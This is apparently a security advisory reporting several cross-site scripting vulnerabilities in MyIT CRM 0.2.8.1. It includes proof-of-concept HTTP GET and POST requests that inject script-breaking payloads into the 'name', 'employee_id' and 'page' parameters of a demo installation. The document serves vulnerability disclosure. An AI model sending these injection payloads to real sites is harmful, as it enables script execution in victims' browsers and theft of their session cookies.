source: https://www.securityfocus.com/bid/42140/info MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected. Proof of Concept: http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees * The parameter 'name' in the POST request has been set to: >"'> POST /?page=employees:main HTTP/1.0 Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd Content-Length: 159 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: demo.myitcrm.com Content-Type: application/x-www-form-urlencoded Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees name=>"'>&submit=Search * The parameter 'employee_id' in the GET request has been set to: >"'> GET /?page=employees:employee_details&employee_id=>"'> HTTP/1.0 Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: demo.myitcrm.com Referer: http://demo.myitcrm.com/?page=employees:main * The parameter 'page' in the POST request has been set to: >%22%27> POST /?page=>%22%27> HTTP/1.0 Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f Content-Length: 19 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: demo.myitcrm.com Content-Type: application/x-www-form-urlencoded Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees name=&submit=Search